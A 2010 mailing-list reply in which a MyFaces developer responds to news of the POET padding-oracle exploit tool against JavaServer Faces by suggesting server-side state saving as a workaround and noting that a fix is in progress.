Am 08.06.10 03:07, schrieb Andre Gironda:
Researchers release point-and-click website exploitation tool --
http://www.theregister.co.uk/2010/06/08/padding_oracle_attack_tool/
Watch POET vs Apache MyFaces -- http://www.youtube.com/watch?v=euujmKDxmC4
Research: Padding Oracle Exploit Tool -- http://netifera.com/research/
Released Monday, Poet exploits a well-known vulnerability in the way
many websites encrypt text stored in cookies, hidden HTML fields and
request parameters. The text is designed to help servers keep track of
purchases, user preferences and other settings while at the same time
ensuring account credentials and other sensitive data can't be
intercepted. By modifying the encrypted information and sending it
back to the server, the attackers can recover the plaintext for small
chunks of the data, allowing them to access passwords and restricted
parts of a webserver.
The fatal flaw making exploitation possible is the failure of
JavaServer Faces to implement AES/DES encryption algorithms correctly.
The scheme provides no way to sign the ciphertext or authenticate the
block cipher mode.
Hello I am not an official voice on this but as far as I can gather, a
quick workaround to the problem is to use server side state saving
instead of client side state saving, we are working actively on a fix
for this problem with the next subreleases which also will fix it also
for client side state saving.
(Please correct me if I am wrong on the quick fix)
Cheers
Werner
